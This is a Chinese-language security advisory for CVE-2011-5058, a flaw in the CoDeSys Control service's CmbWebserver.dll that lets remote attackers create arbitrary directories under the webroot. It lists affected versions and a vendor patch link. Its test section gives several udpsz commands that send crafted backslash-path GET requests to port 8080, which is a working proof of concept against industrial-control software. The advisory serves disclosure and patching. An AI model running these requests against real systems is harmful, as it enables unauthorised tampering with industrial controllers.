CoDeSys Control服务CmbWebserver.dll模块目录遍历漏洞
CoDeSys Control服务CmbWebserver.dll模块目录遍历漏洞
发布日期:2011-11-29
更新日期:2012-12-01
受影响系统:
3S CoDeSys 3.4 SP4 Patch 2
3S CoDeSys 2.3
不受影响系统:
3S CoDeSys 3.5
3S CoDeSys 2.3.9.32
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56732
CVE(CAN) ID: CVE-2011-5058
CoDeSys是Windows平台下,独立于硬件的IEC 61131-3开发系统,用于编程和创建控制器应用。
3S CoDeSys 3.4 SP4 Patch 2内的Control服务CmbWebserver.dll模块在处理包含不存在目录的HTTP GET请求时存在错误,通过向TCP端口8080发送特制请求,可允许远程攻击者在Webroot下创建任意目录。
<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:http://secunia.com/advisories/47018
http://aluigi.altervista.org/adv/codesys_1-adv.txt
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
udpsz -T -c "GET /dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
...
建议:
--------------------------------------------------------------------------------
厂商补丁:
3S
--
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.codesys.com/download.html
评论暂时关闭